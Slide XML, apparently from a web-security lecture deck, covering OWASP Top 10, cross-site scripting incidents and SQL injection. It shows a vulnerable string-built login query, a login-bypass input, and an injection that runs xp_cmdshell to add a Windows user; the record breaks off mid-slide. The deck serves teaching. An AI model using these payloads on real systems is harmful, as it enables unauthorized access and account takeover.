          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>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7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>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7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>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7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>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7600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFD624"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Top_10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B290B4E-2025-A5FF-D008-80D9084B85E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2357054D-54A3-4E17-AF01-C92987ED5E69}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43E94F4-9ADD-0793-640B-CFDE9FFB7B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377983733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nb-NO" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS) Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3A27EB94-C4A3-433C-A452-749C6592F538}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder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56148" y="1501092"/>
            <a:ext cx="4592065" cy="477996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024127" y="1417593"/>
            <a:ext cx="6096000" cy="4468916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0645AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" tooltip="Code injection"/>
              </a:rPr>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0645AD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5" tooltip="Client-side script"/>
              </a:rPr>
              <a:t>client-side scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> into web pages viewed by other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>A hacker was able to insert JavaScript code into the Obama community blog section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
              <a:t>The JavaScript would redirect the users to the Hillary Clinton website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>YouTube Demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Read about it on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>ChannelWeb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Websites from FBI.gov, CNN.com, Time.com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0" err="1"/>
              <a:t>Ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>, Yahoo, Apple computer, Microsoft, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0" err="1"/>
              <a:t>Zdnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>, Wired, and Newsbytes have all had XSS bugs</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2200128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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732163" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184526" y="1562101"/>
            <a:ext cx="6721475" cy="36671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63500">
                <a:solidFill>
                  <a:srgbClr val="FFCC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endParaRPr lang="nb-NO" altLang="nb-NO">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732164" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="883403" y="1447801"/>
            <a:ext cx="10569844" cy="2794611"/>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63500">
                <a:solidFill>
                  <a:srgbClr val="FFCC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20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements. “ (Wikipedia)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="732165" name="Picture 5" descr="sql inj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6" y="3586566"/>
            <a:ext cx="7781925" cy="281940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1F790E1F-027B-DB24-D772-12C1089F0064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{24D03A40-6630-4940-8230-AA6527075669}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C88AD7-55F8-D61C-334D-9EEEDBB468BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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28122783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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1219200"/>
            <a:ext cx="8458200" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>Login Example Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Text in blue is your SQL code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Text in orange is the hacker input,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>black text is your application code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>Login:			       Password:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nb-NO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>Dynamically Build SQL String performing authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0" err="1"/>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t> + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and password= ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>” + password + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>Hacker logs in as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ or ‘’ = ‘’; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ or ‘’ = ‘’; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ and password=‘’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589828" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="2286000"/>
            <a:ext cx="2286000" cy="3810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b-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589829" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2286000"/>
            <a:ext cx="2362200" cy="3810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b-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8A2CE8-2A90-9C8E-75B5-AD90447BF8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{212A9803-E406-456A-B8AF-499EB4C252F5}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AF2DAE4-3EB4-1428-E8F4-0B44B7743A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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074098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a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>More Dangerous SQL Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1524000"/>
            <a:ext cx="8763000" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>Hacker creates a Windows Account: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’; exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'net users username password /add';--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and password= ’’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>And then adds himself as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0" err="1"/>
              <a:t>adminstrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE login = ‘</a:t>
            </a:r>
            <a:r>
